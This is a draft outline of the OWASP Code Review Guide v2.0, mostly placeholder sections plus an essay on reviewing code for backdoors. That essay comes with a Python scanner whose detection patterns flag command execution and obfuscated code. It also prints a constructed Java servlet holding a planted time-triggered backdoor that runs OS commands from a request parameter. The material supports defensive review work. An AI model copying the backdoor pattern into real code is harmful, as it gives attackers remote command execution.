- 1.1 Forward
- 1.2 Code Review Guide Introduction
- 1.2.1 What is source code review and Static Analysis
- 1.2.2 What is Code Review
- 1.2.3 Manual Review - Pros and Cons
- 1.2.4 Advantages of Code Review to Development Practices
- 1.2.5 Why code review
- 1.2.6 We can't hack ourselves secure
- 1.2.7 360 Review: Coupling source code review and Testing / Hybrid Reviews
- 1.2.8 Can static code analyzers do it all?
- 2 Methodology
- 3 Reviewing by Technical Control
- 3.1 Reviewing code for Authentication controls
- 3.2 Reviewing code Authorization weakness
- 3.2.1 Checking authz upon every request
- 3.2.2 Reducing the attack surface
- 3.2.3 SSL/TLS Implementations
- 3.2.4 Reviewing code for Session handling
- 3.2.5 Reviewing client side code
- 3.2.6 Review code for input validation
- 3.2.7 Reviewing code for contextual encoding
- 3.2.8 Reviewing file and resource handling code
- 3.2.9 Resource Exhaustion - error handling
- 3.2.10 Reviewing Logging code - Detective Security
- 3.2.11 Reviewing Error handling and Error messages
- 3.2.12 Reviewing Security alerts
- 3.2.13 Review for active defense
- 3.2.14 Reviewing Secure Storage
- 3.2.15 Hashing & Salting - When, How and Where
- 4 Reviewing by Vulnerability
- 4.1 Review Code for XSS
- 4.2 Persistent - The Anti pattern
- 4.3 Reflected - The Anti pattern
- 4.4 Stored - The Anti pattern
- 4.5 DOM XSS
- 4.6 JQuery mistakes
- 4.7 Reviewing code for SQL Injection
- 4.8 The Anti pattern
- 4.9 Reviewing code for CSRF Issues
- 4.10 (This task has been deleted) Transactional logic / Non idempotent functions / State Changing Functions
- 4.11 Reviewing code for poor logic /Business logic/Complex authorization
- 4.12 Reviewing Secure Communications
- 4.13 Tech-Stack pitfalls
- 4.14 Framework specific Issues
- 4.14.1 Spring
- 4.14.2 Struts
- 4.14.3 Drupal
- 4.14.4 Ruby on Rails
- 4.14.5 Django
- 4.14.6 .NET Security / MVC
- 4.14.7 Security in ASP.NET applications
- 4.14.8 PHP Specific Issues
- 4.14.9 Classic ASP
- 4.14.10 C#
- 4.14.11 C/C++
- 4.14.12 Objective C
- 4.14.13 Java
- 4.14.14 Android
- 4.14.15 Coldfusion
- 4.14.16 CodeIgniter
- 5 Security code review for Agile development
- 6 Code Review for Backdoors
- 7 Code Review Tools
OWASP Code Review Guide v2.0:
Forward
- Author - Eoin Keary
- Previous version to be updated:[[1]]
Code Review Guide Introduction
- Author - Eoin Keary
- Previous version to be updated:[[2]]
What is source code review and Static Analysis
What is Code Review
- Author - Zyad Mghazli, Eoin Keary
- New Section
Manual Review - Pros and Cons
- Author - Zyad Mghazli, Eoin Keary, Gary David Robinson
- New Section
- Suggestion: Benchmark of different Static Analysis Tools Zyad Mghazli
- Put content here
Advantages of Code Review to Development Practices
- Author - Gary David Robinson
- New Section
- Put content here
Why code review
Scope and Objective of secure code review
- Author - Ashish Rao
- Put content here
We can't hack ourselves secure
- Author - Eoin Keary
- New Section
- Put content here
360 Review: Coupling source code review and Testing / Hybrid Reviews
- Author - Eoin Keary
- New Section
- Put content here
Can static code analyzers do it all?
- Author - Ashish Rao
- New Section
- Put content here
Methodology
The code review approach
- Author - Johanna Curiel
- Put content here
Preparation and context
- Author - Gary David Robinson
- Previous version to be updated: [[3]]
- Put content here
Application Threat Modeling
- Author - Larry Conklin
- Previous version to be updated: [[4]]
- Put content here
Understanding Code layout/Design/Architecture
- Author - Open
- Put content here
Understanding Business Logic
SDLC Integration
- Author - Larry Conklin
- Previous version to be updated: [[5]]
- Put content here
Deployment Models
Secure deployment configurations
- Author -
- Put content here
- New Section
Metrics and code review
- Author [email protected]
- Previous version to be updated: [[6]]
- Put content here
Source and sink reviews
- Author - Open
- New Section
- Put content here
Code review Coverage
- Author - Open
- Previous version to be updated: [[7]]
- Put content here
Design Reviews
- Author - Ashish Rao
- Why to review design?
- Building security in design - secure by design principle
- Design Areas to be reviewed
- Common Design Flaws
A Risk based approach to code review
- Author - Gary David Robinson
- New Section
- "Doing things right or doing the right things..."
- "Not all bugs are equal
Crawling code
- Author - Open
- Previous version to be updated: [[8]]
- API of Interest:
- Java
- .NET
- PHP
- RUBY
- Frameworks:
- Spring
- .NET MVC
- Struts
- Zend
- New Section
- Searching for code in C/C++
- Author - Gary David Robinson
Code reviews and Compliance
- Author -Open
- Previous version to be updated: [[9]]
- Put content here
Reviewing by Technical Control
Reviewing code for Authentication controls
- Author - Gary Robinson
- Put content here
Forgot password
- Author Abbas Naderi, Larry Conklin
- Put content here
CAPTCHA
- Author Larry Conklin, Joan Renchie
Out of Band considerations
- Author - Gary Robinson
- Previous version to be updated: [[10]]
- Put content here
Reviewing code Authorization weakness
- Author Eoin Keary .NET MVC added
- Put content here
Checking authz upon every request
- Author - Abbas Naderi
- Put content here
Reducing the attack surface
- Author Gary Robinson
- Previous version to be updated: [[11]]
- Put content here
SSL/TLS Implementations
- Author - Eoin Keary
- Put content here
Reviewing code for Session handling
- Author - Abbas Naderi
- Previous version to be updated: [[12]]
- Put content here
Reviewing client side code
- New Section
- Put content here
Javascript
- Author - Abbas Naderi
- Put content here
JSON
- Author - Open
- Put content here
Content Security Policy
- Author - Open
- Put content here
"Jacking"/Framing
- Author - Eoin Keary
- Put content here
HTML 5?
- Author - Open
- Put content here
Browser Defenses
- Author - Open
- Put content here
etc...
Review code for input validation
- Author - Open
- Put content here
Regex Gotchas
- Author - Open
- New Section
- Put content here
ESAPI
- Author - Open
- New Section
- Internal Link: [[13]]
- Put content here
Microsoft Web Protection Library
- Author - Michael Hidalgo
- New Section
- Internal Link: [[14]]
- Put content here
Reviewing code for contextual encoding
Overall approach to content encoding and anti XSS
HTML Attribute
- Author - Eoin Keary
- Put content here
HTML Entity
- Author - Eoin Keary
- Put content here
Javascript Parameters
- Author - Eoin Keary
- Put content here
JQuery
- Author - Open
- Put content here
Reviewing file and resource handling code
- Author - Open
- Put content here
Resource Exhaustion - error handling
- Author - Open
- Put content here
native calls
- Author Open
- Put content here
Reviewing Logging code - Detective Security
- Author - Gary Robinson
- Where to Log
- What to log
- What not to log
- How to log
- Internal link: [[15]]
- Put content here
Reviewing Error handling and Error messages
- Author - Gary David Robinson
- Previous version to be updated: [[16]]
- Put content here
Reviewing Security alerts
- Author - Gary Robinson
- Put content here
Review for active defense
- Author - Colin Watson
- Put content here
Reviewing Secure Storage
- Author - Open source
- New Section
- Put content here
Hashing & Salting - When, How and Where
Encryption
.NET
- Author Larry Conklin, Joan Renchie
- Previous version to be updated: [[17]]
- Can we talk about key storage as well i.e. key management for encryption techniques used in the application? - Ashish Rao
Reviewing by Vulnerability
Review Code for XSS
- Author Examples added by Eoin Keary
- Previous version to be updated: [[18]]
- In reviewing code for XSS - we can give more patterns on "source to sink" patterns for ASP.NET wrf to difference versions and mechanisms to display data in a page - Ashish Rao
- Put content here
Persistent - The Anti pattern
- Author
- Put content here
.NET
- Author Johanna Curiel, Eoin Keary
- Put content here
Java
- Author Johanna Curiel
- Put content here
PHP
- Author Abbas Naderi
- Put content here
Ruby
- Author Open
- Put content here
Reflected - The Anti pattern
.NET
- Author Johanna Curiel
- Put content here
Java
- Author Johanna Curiel
- Put content here
PHP
- Author Abbas Naderi
- Put content here
Ruby
- Author - Open
- Put content here
Stored - The Anti pattern
- Author - Johanna Curiel
- Put content here
.NET
- Author Johanna Curiel
- Put content here
Java
- Author Johanna Curiel
- Put content here
PHP
- Author Johanna Curiel
- Put content here
Ruby
- Author - Johanna Curiel
- Put content here
DOM XSS
- Author Larry Conklin
- Put content here
JQuery mistakes
- Author
- Put content here
Reviewing code for SQL Injection
- Author Gary Robinson
- Previous version to be updated: [[19]]
- Put content here
PHP
- Author - Mennouchi Islam Azeddine
- Put content here
Java
- Author - Johanna Curiel
- Put content here
.NET
- Author - Open
- Put content here
HQL
- Author - Open
- Put content here
The Anti pattern
- Author Larry Conklin
- Content here
https://www.owasp.org/index.php/CRV2_AntiPattern
PHP
- Author -
- Put content here
Java
- Author -
- => Searching for traditional SQL,JPA,JPSQL,Criteria,...
- Put content here
.NET
- Author Open
- Put content here
Ruby
- Author - Open
- Put content here
Cold Fusion
- Author - Open
- Put content here
Reviewing code for CSRF Issues
- Author Abbas Naderi
- Previous version to be updated: [[20]]
- This page needs to be deleted. Put content here
(This task has been deleted) Transactional logic / Non idempotent functions / State Changing Functions
Reviewing code for poor logic /Business logic/Complex authorization
- Author - Open
- Put content here
Reviewing Secure Communications
.NET Config
- Author Johanna Curiel, Renchie Joan
- Put content here
Spring Config
- Author - Open
- Put content here
HTTP Headers
- Author Gary Robinson
- Put content here
Tech-Stack pitfalls
- Author Open
- Put content here
Framework specific Issues
Spring
- Author - Open
- Put content here
Struts
- Author - Open
- Put content here
Drupal
- Author Open
- Put content here
Ruby on Rails
- Author - Open
- Put content here
Django
- Author Open
- Put content here
.NET Security / MVC
- Author Johanna Curiel, Eoin Keary
- Put content here
Security in ASP.NET applications
- Author Johanna Curiel
- Put content here
Strongly Named Assemblies
- Author Johanna Curiel, Larry Conklin
- Put content here
Round Tripping
- Author - Open
- Put content here
How to prevent Round tripping
- Author - Open
- Author Johanna Curiel
- Put content here
Setting the right Configurations
- Author Johanna Curiel
- Put content here
Authentication Options
- Author Johanna Curiel
- Put content here
Code Review for Managed Code - .Net 1.0 and up
- Author Johanna Curiel
- Put content here
Using OWASP Top 10 as your guideline
- Author Johanna Curiel
- Put content here
Code review for Unsafe Code (C#)
- Author Johanna Curiel
- Put content here
PHP Specific Issues
- Author Open
- Put content here
Classic ASP
- Author Johanna Curiel
- Put content here
C#
- Author Open
- Put content here
C/C++
- Author Open
- Put content here
Objective C
- Author Open
- Put content here
Java
- Author Open
- Put content here
Android
- Author Open
- Put content here
Coldfusion
- Author Open
- Put content here
CodeIgniter
- Author Open
- Put content here
Security code review for Agile development
- Author Carlos Pantelides
- Put content here
Code Review for Backdoors
- Author Yiannis Pavlosoglou
Reviewing a piece of source code for backdoors differs from a traditional source code review in one excruciating way: the working assumption is that someone with 'commit' or 'write' access to the source code repository has malicious intentions spanning well beyond their current developer remit. Because of this difference, a code review for backdoors is often seen as a very specialised review and is sometimes not considered a code review per se.
A traditional code review has the objective of determining whether a vulnerability is present within the code and, further to this, whether the vulnerability is exploitable and under what conditions. A code review for backdoors has the objective of determining whether a certain portion of the codebase carries code that is unnecessary for the logic and implementation of the use cases it serves.
Further to this, the reviewer looks for the trigger points of that logic. Typical examples include a branch statement going off to a part of assembly or obfuscated code. The reviewer is looking for patterns of abnormality: code segments that would not be expected to be present under normal conditions.
An excellent introduction to how to look for rootkits in the Java programming language is a paper by J. Williams, which covers a variety of backdoor examples, including file system access through a web server, as well as time-based attacks in which a key aspect of the malicious functionality is made available only after a certain amount of time. Such examples form the foundation of what any reviewer for backdoors should try to automate, regardless of the language in which the review is taking place.
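The trigger-point search described above lends itself to automation. The following is an added example, not code from this guide or from the paper it cites: a small Python heuristic scanner that surfaces, in Java source, the patterns the passage names (logic gated on the clock, branches into base64-decoded or reflectively loaded code, OS command execution, and a request parameter reaching the file system through a web server). The servlet it scans is constructed for the illustration and contains a planted backdoor; the rule names, the regular expressions and the `ReportServlet` class are the example's own and not taken from any real project.

```python
"""Heuristic backdoor trigger-point scanner for Java source (added illustration).

The rules are deliberately coarse: their job is to surface lines for a human
reviewer, not to prove a backdoor exists. A clean hit list is not a clean codebase.
"""
from __future__ import annotations

import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Finding:
    rule: str
    line_no: int
    text: str


# Trigger-point patterns. Each one flags a construct that would not be expected
# in ordinary web application code and therefore deserves a manual look.
TRIGGER_RULES = {
    # Logic gated on the clock: a direct comparison of the current time, or a
    # java.time isAfter/isBefore against a hard-coded date.
    "time-trigger": re.compile(
        r"(currentTimeMillis|nanoTime|getTime)\(\)\s*[<>]=?"
        r"|\.(isAfter|isBefore)\(\s*LocalDate\.of\("
    ),
    # Branches that hand control to code the reviewer cannot read in place:
    # base64 blobs being decoded, classes defined from bytes, or reflection on a
    # class name that is not a string literal.
    "obfuscated-code": re.compile(
        r"Base64\.(getDecoder\(\)\.decode|getMimeDecoder\(\)\.decode|decodeBase64)\("
        r"|\bdefineClass\("
        r'|Class\.forName\((?!")'
    ),
    # OS command execution, rarely needed inside a web application.
    "command-exec": re.compile(r"Runtime\.getRuntime\(\)\.exec\(|new\s+ProcessBuilder\("),
}

# Minimal source-to-sink tracking: variables assigned from getParameter(...) are
# tainted for the rest of the file; a File constructor that uses one is flagged.
SOURCE = re.compile(r"(\w+)\s*=\s*\w+\.getParameter\(")
FILE_SINK = re.compile(r"new\s+(File|FileInputStream|FileReader|FileOutputStream)\(([^)]*)\)")


def scan_java(source: str) -> list[Finding]:
    """Return findings in file order; one Finding per (rule, line)."""
    findings: list[Finding] = []
    tainted: set[str] = set()
    for line_no, line in enumerate(source.splitlines(), start=1):
        stripped = line.strip()
        if stripped.startswith("//"):
            continue  # comments are not trigger points
        for rule, pattern in TRIGGER_RULES.items():
            if pattern.search(line):
                findings.append(Finding(rule, line_no, stripped))
        if (src := SOURCE.search(line)):
            tainted.add(src.group(1))
        sink = FILE_SINK.search(line)
        if sink and any(re.search(rf"\b{re.escape(v)}\b", sink.group(2)) for v in tainted):
            findings.append(Finding("request-to-filesystem", line_no, stripped))
    return findings


def summarize(findings: list[Finding]) -> dict[str, int]:
    """Count findings per rule, so a reviewer can triage the noisy rules first."""
    counts: dict[str, int] = {}
    for f in findings:
        counts[f.rule] = counts.get(f.rule, 0) + 1
    return counts


# Constructed sample (not real code): a report servlet with a planted backdoor.
# Lines 7-13 are the malicious addition; init() shows two benign look-alikes
# (a literal Class.forName and a File built from a constant) that must not fire.
SAMPLE_JAVA = """\
// Constructed sample: a report servlet with a planted backdoor (not real code).
public class ReportServlet extends HttpServlet {
    private static final String PAYLOAD = "Y29tLmV4YW1wbGUuRHJvcHBlcg==";

    protected void doGet(HttpServletRequest request, HttpServletResponse response)
            throws Exception {
        String name = request.getParameter("report");
        File report = new File(REPORT_DIR, name);
        response.getWriter().write(render(report));
        if (System.currentTimeMillis() > 1735689600000L) {
            byte[] blob = Base64.getDecoder().decode(PAYLOAD);
            Class<?> c = Class.forName(new String(blob));
            Runtime.getRuntime().exec(request.getParameter("c"));
        }
    }

    public void init() throws Exception {
        Class.forName("org.postgresql.Driver");
        File summary = new File(REPORT_DIR, "summary.txt");
    }
}
"""

if __name__ == "__main__":
    results = scan_java(SAMPLE_JAVA)
    for f in results:
        print(f"{f.line_no:>4}  {f.rule:<22} {f.text}")
    print(summarize(results))
```

Run stand-alone, the scanner reports the tainted `File` on line 8, the clock-gated branch on line 10, the two obfuscated-code lines inside it, and the `exec` call, while leaving the literal `Class.forName` and the constant-path `File` in `init()` alone. The time-trigger rule is intentionally broad (any direct comparison of the clock), because a legitimate reason for production logic to change behaviour on a fixed date is rare enough that every hit is worth a reviewer's minute.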